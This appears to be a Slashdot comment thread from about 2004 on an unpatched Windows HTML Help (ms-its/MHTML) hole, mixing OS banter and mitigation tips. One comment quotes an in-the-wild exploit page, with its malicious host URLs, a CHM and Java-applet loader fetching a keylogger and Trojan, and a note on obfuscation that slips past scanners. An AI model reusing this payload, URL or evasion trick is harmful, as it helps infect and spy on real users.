You can do it if the link ends up invoking rundll32 (for certain control panel components, for example). But if you use Right-Click Run As... on something like My Computer or the explorer icon you're not actually running it as another user. Go ahead, try it! Even with "Launch folders in a seperate process" you'll see that it'll accept the alterante user/password but no new window will launch. (hit CTRL+ALT+DELETE and check the processes running, you won't find explorer running as Administrator, I assure you)
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
"What's a floppy??? Don't they have pills or something to fix it??"
Only for those who buy from SPAM. The rest of us must simply suffer tiny floppies. Plus, we miss out on our slice of the Nigerian wealth.
*sigh*
In Windows, it feels like the WINNT user/administrator model has been poorly integrated with the Win95 "wide open" model. I suppose it probably works better in big corporate environments where users are not allowed to install software at all to control tech support costs, and so having them be restricted all the time is fine. However, it works poorly in a home environment where the user and administrator are usually the same person. There doesn't seem to be any obvious reason why MS couldn't add this feature to XP since they already have the "multiple users" feature.
help is on the way?
it would be ok if all of those infactdead machines relaying all of that virotic spam would go DOWn?
seems as though most of the usual spam has just gone away?
good thing j. public just down right refuses to act peaced off/dissatisfied?
consult with/trust in yOUR creators... this stuff is unbreakable, & wwworks on several (more than 3) dimensions.
the wildly popular planet/population rescue initiative remains on high crisis alert/intervention mode.
oh educate us oh mighty one.
You don't need to actively use the help system to be hit by this. It involves getting the user to follow a link in IE (or possibly, another browser) that triggers the help system to load an HTML page off the Internet with an exploit.
If the mythical mom was running KDE, she could have sent you a request for remote help by email, which works great. You take over the machine and help things.
And if you had set up the system for your mom, you would have kept the password for root, sshed remotely and done everything for her. Problem solved...
Stop looking for issues where there are none.
Pragmatism as an ideology is not particularly pragmatic in the long term. Keep it in mind when you dismiss Free Software
... any other examples?
Ugly is right, and it's typical of MS to want to make 'compiled HTML files' in the first place.
They made their bed; now they can toss and turn in it.
Here is a list of WEEKLY security vulnerabilities in all Linux distributions.
Do you ever see any of them mentioned on Slashdot? Of course not. That's because it would reveal to people that operating systems are not perfect and never will be--and the fact that this is the first Slashdot "vulnerability" article on Windows in quite a while now is a feat considering Windows' massive marketshare and usage. I'm sure the editor was just dying to get it posted since it's been a little while. Meanwhile, the Linuxsecurity site shows that Linux distros have multiple security advisories every week.
Point? No point other than to point it out. No problem with Slashdot reporting these things, but pretending there's no agenda behind it--especially considering Slashdot is owned by a Linux company for whom it is in the best interest of to post "news stories" that happen to dump on competitors--is being purposely naive.
Using the Recovery console to disable a service simply sets the Registry 'Start' value of that service to 0x4, exactly the same as using the Services MMC snap-in. It is no more "magic" than using the GUI. The only advantage is that one can use the recovery console if something in Windoze is borked to the point of not booting properly.
It is literally amazing to me the amount of blantant FUD being spread around here by so-called computer types.
There are currently no patches available and no virus definitions for the major scanners. As well, exploits have been reported in the wild.
MS Security Chief: Windows Never Exploited Until Patch Available
... and run linux myself. I just have a lot of friends who are still running windows (most of them by far) and I wanted to offer more precise and comprehensible instructions to them to avoid the nasties. I will admit I haven't been too effective in "evangelizing" switching OSs, because most of my friends are netfriends, so I can't just go over to their house and help them through first install and getting it all setup, etc.. Most people struggle by with patches, firewalls etc and have grown very familiar with their systems and honestly seem to not want to change, just fix it. It's inertia mostly. I think most people are still running 98 for instance. I asked on another article last week or so but didn't get any replies, asking if any web masters who run non technical non geek sites, just regular old sites would confirm that or not. heck, I know several people still running 95, because it still surfs good enough with their old machines, and they see no reason to purchase an expensive new machine. True facts there.
I have been advising people to switch browsers, etc for a long time, some have, that's about the best I can do. It takes actual physical interaction with people and direct help for them to see that they have viable alternatives. MS comes on their boxes, their kids play MS games, etc, they aren't in any rush to switch. This will not change until people buy a new computer with an alternative OS installed on it from the git-go, and that OS better work for them full GUI with no command line tweaking, and I've said that for years now.
This news raises the issue of MSIE being started by other applications, even if you use another browser as your default. Well, it is not hard to disable MSIE. (It's probably not wise to try to remove it.) The MSHTML.DLL is the HTML rendering control of IE, borrowed by many Microsoft apps and help, as well as things like Kazaa that have built in browsers. Basically, all you need to do is find all instances of MSHTML.DLL on your system and set the permission to No Access for everything. No more worries about IE starting up on you, although from time to time you may possibly find that you need to enable it for a small task or two.
Windows is so easier to use that you never even need the help. This security hole is a non-issue.
In order to exploit the help system, would the user need to dl and execute a help file? Once you can get a user to dl and execute something there isn't actually a need for a vulnerability and it's beyond what the OS can reasonably deal with.
I don't have WinXP but XPlite should replace the web integrated shell with a more secure version. I put the free 98lite version on every Win98 I have used. The free version is not shareware but the paid version does a lot more. It looks like I will be trying this soon as my mother runs WinXP pro and she already got the blaster worm 1 day before it was discovered. She doesn't use IE but who knows how long it will be till she gets hit again.
Star Trek, there maybe hope.
>Remove the spaces that slashcode adds!
gewg_
Given that Symantec's flagship AV product actually erases the archived mailbox files for the Mail.app and Eudora, some AV solutions are more dangerous than the problem at this stage.
Of course, Norton tools in general have a history of doing more harm than good on the Mac (since OS 8.1, anyway). I've lost count of the number of times I've rebuilt the HFS+ file stucture after people have "fixed" their directories....
...downloading a dirty help file or else manage to get them to view your html via their help client.
;)
The first example (downloading) applies to people just as stupid as to download an executable and run it as well. The second would require you (afaik) to have a local help file that referenced another link that had been replaced with infected html.)
I don't think you can (even with some effort) view a webpage via HTML help without being linked there by a help file which you already have.
So, it doesn't appear to be an end of the world scenario by any means... Of course, on Slashdot we like to make fun of the devil a little bit too much.
Loading...
This is *bound* to infect the 5 or 6 Windows users who actually read the help files!
that lists all the unpatched, arbitrary code vulnerabilities in Windows XP? I know I can look up viruses at Norton or McAfee's site or a dozen other places. I was wondering if anyone's tracking just the unpatched stuff though.
Hi! I make Firefox Plug-ins. Check 'em out @ https://addons.mozilla.org/en-US/firefox/addon/youtube-mp3-podcaster/
"It seems like you're trying to exploit a security hole. Would you like help?"
Whoa! Deja Vu!
It's almost echoing this recent thread in the Kernel Panic strip.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
You know what'd be cool? A joke trojan that used your scanner to play music.
There used to be a program that'd play a MIDI file on an HP ScanJet II by moving the motor at different speeds for different pitches. It was funny as hell. I wonder if that still exists anywhere, and would work with the new-fangled USB ScanJets...
I found this page yesterday, it is an exploit of this vulnerability.
; s-its:mhtml:file://c:\\nosuch.mht!http://hard-virg ins.com/sher/x.chm::/x.htm'));t width=1 height=1 ARCHIVE=loader.jar code=Counter></APPLET>
/.
WARNING - IF YOU ARE USING IE, THIS PAGE WILL LOAD SERVERAL EXPLOITS INTO YOUR SYSTEM - NOTABLY SHERLOK2.EXE (KEY LOGGER) AND REG33.EXE (DISABLED WINDOWS UPDATE). YOU HAVE BEEN WARNED!
The link is here.
http://hard-virgins.com/sher/test.html
For those who don't want to follow it, here is the page source.
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'m
</script>
<apple
</body></html>
This loads and runs the x.chm file from
http://hard-virgins.com/sher/x.chm
and also the loader.jar file from
http://hard-virgins.com/sher/loader.jar
Loader.jar contains the Byte.Verify Trojan to gain full access.
Notice the use ${PR} and then substitution for the exploit code. I don't know exactly why they did that, maybe to stop scanners that check object data. Also note the use of the hex m (m) instead of just the char 'm'. This gives the 'ms-its' type but will get by dumb scanners (read enterprise firewall filters).
I was still pondering why in the world they would be loading a help file when i saw this story, so thanks for ansering my question
BTW, if you are running NAV2004 with fairly recent definitions (reg33.exe, sherlok2.exe, and parser.class are fairly old exploits) than norton will stop these exploits from running and delete them, but they still get on your system just fine.
So careful out there, this exploit is dangerous.
"The crows seemed to be calling his name, thought Caw."
I'd like to take the time to apologize for the shortcomings of my advice regarding restricted user accounts and privilege level. I try to lock things down and I do what you can, but sometimes things don't always work out the way I want them to. Some things just aren't as simple and cut and dry as I would like to believe they are. And I apologize if my advice was short sighted or misleading.
But which one will be patched sooner so that img src= is restricted to http/https protocols only? (Except for HTML from file://, which can also access file://...)
--
Internet Explorer (n): Another bug -- that is, a feature that can't be turned off -- in Windows.
Name something that SP1 broke that either:
a) Affected you.
or
b) Hasn't been fixed via Hotfix already.
Not All Who Wander Are Lost
Since no one writes documentation for OSS, such a bug is a non-issue.
(DISCLAIMER: this is a joke, there is no guarantee that this joke will be funny to you and this joke comes with NO WARRANTY WHATSOEVER)
True story.
Are there any other viewers that can read .CHM files , specifically ones that don't use the vulnerable IE libraries?
.CHM files on *nix machines?
.CHM files to a format that is more supported (PDF, or standard HTML/XML or something else)?
Perhaps something open source?
What is there out there that can read
Or is there something that can convert
Hmmm, no replies to this. Maybe you finally got the linux zealots to stfu for a minute.
I cannot wait for the NX (no execute) bit to become part of the mainstream PC archtecture and operating systems. I wonder why it couldn't have happened years ago. Some mainframe systems had it decades ago.
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
Where are the articles on the latest kernel exploits in Linux and *BSD? If Slashdot really desired to be fair and balanced, they would publish an equal amount of stories on Linux exploits as they do on Microsoft exploits. But they don't, because they want to have some feeling of "superiority" that they are covering up information that they feel might be harmful to their cause if let out.
Slashdot's lack of editorial integrity makes me never want to come back to this site. I don't understand how people can read the front page with a straight face anymore.
To really get rid of IE you need to remove..... Windows, and install Linux.
IE 6.0 and Firefox 0.8 do indeed open up a compose email window. Mozilla 1.6, OTOH, just sits there with a broken picture icon.
I'm not sure which is more interesting - that Firefox allows it such a boneheaded thing or that Firefox allows it when Mozilla does not. Aren't both using the same version of Gecko (I'm assuming that this is a function that Gecko would handle)?
What's that, mom, you want to install an application?
.rpm file for Mandrake Linux from the web, right? OK. Double-click it and follow the instructions. Then click the button in the bottom left of the screen and look through the menus until you find the program.
You downloaded the software as a
*click*
GCHQ Quantum Insert installed. If only our tongues were made of glass, how much more careful we would be when we speak
Maybe the post was so stupid that nobody bothered to reply.
I am pretty sure microsoft is doing everything in it's power to make windows a more secure platform. I am also sure it's number 1 priority on bill gates list. Since a secure windows environment will make him and his company even more money to do great new things :D
Kapitalism at it's best as they say ! :D
So far the only MS products I know of that come without security problems are the dead-tree manuals and books.
No, actually, I think you can still hurt somebody pretty bad with one of those...
This message brought to you by Jack Schitt's Previously Shat Shit
Unfortunately, I haven't been able to get any info as to when this will be other than Customer Service saying Real Soon Now.
Tech Public Policy stuff
For those that haven't read the link, here it is (in a few words): if the MSHTML engine does not find a certain page, then it is redirected to another page automatically. This other page, defined by some external source, is executed in the same security context as the one that was not found.
In other words, I can send you a URL which makes it possible to automatically upload to you any software I like.
Well done Microsoft, for one more time.
You're a helper monkey! This isn't helping!
Democracy is two wolves and a sheep voting on lunch.
Yes, it's a nice exploit demonstration, but if it works on your system it'll break Windows Media Player.
I know, I know, I need to move to Linux, but until I can move my full user base (my wife) along, this is what I'm stuck with.
The warning about backing up wmplayer.exe wasn't exactly strong enough to actually make me do it.
Maybe they issue a PR only after they've FINALLY created a fix...that way they can release the fix soon after the PR, so's to look efficient and "on to it"...
just another tinfoil hatter.
...tried running GNU/Linux on a Mac? It's heaven! Now if only I could find an ATI driver...
Every time you run "emerge", a Microsoft drone dies.